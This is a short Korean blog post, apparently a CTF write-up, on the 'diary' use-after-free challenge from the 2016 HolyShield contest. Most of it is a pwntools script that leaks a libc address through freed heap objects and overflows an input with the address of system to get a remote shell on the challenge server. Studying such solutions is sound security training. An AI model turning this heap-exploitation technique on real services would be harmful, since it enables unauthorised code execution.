2016 holyshield diary
by St1tchuse after free bug문제이다.
대회 때 못풀어서, 학교 셤 끝나고 다시 풀어보았다.
빨리 review문제도 풀어야겠다.
from pwn import *
local = False
if local :
s = process('./diary')
print util.proc.pidof(s)
pause()
else :
s = remote('kimtae.xyz', 9989)
def command(token, *args) :
s.recvuntil(token)
for i in args :
i = str(i)
s.sendline(i)
fast = lambda token, *args : command(token, *args)
def solver() :
log.success('login...')
fast(':', '/bin/sh\x00', '25')
fast('>', '3')
fast(':', 'rop payload')
log.success('plan create...')
fast('>', '1', '2')
fast(':', 'stitch', '7', '7', 'stitch')
fast('>', '2')
fast(':', 'stitch', '7', '7', 'stitch')
log.success('plan free...')
fast('>', '4', '100')
log.success('addr leak...')
fast('>', '1')
s.recvuntil('Plan name : ')
leak = s.recv(6)+'\x00\x00'
target = hex(u64(leak) - 3663848)
addr = p32(int(target[-8:],16))
score = int(target[2:6], 16) - 100
log.info('system addr = {0}'.format(target))
log.success('game 1 go...')
fast('>', '6', '3', '1', '100')
s.recvuntil('.\n')
s.sendline('3')
s.recvuntil('comment\n')
s.sendline('fuck!')
log.success('game 2 go...')
fast('>', '1', '-'+str(score))
s.recvuntil('.\n')
s.sendline('3')
fast('>', str(score+100), '3')
s.recvuntil('comment\n')
s.sendline('a'*84 + addr)
log.success('get shell !! ')
fast('>', '3', '1', '1')
s.interactive()
if __name__ == '__main__' :
solver()
블로그의 정보
튜기's blogg(st1tch)
St1tch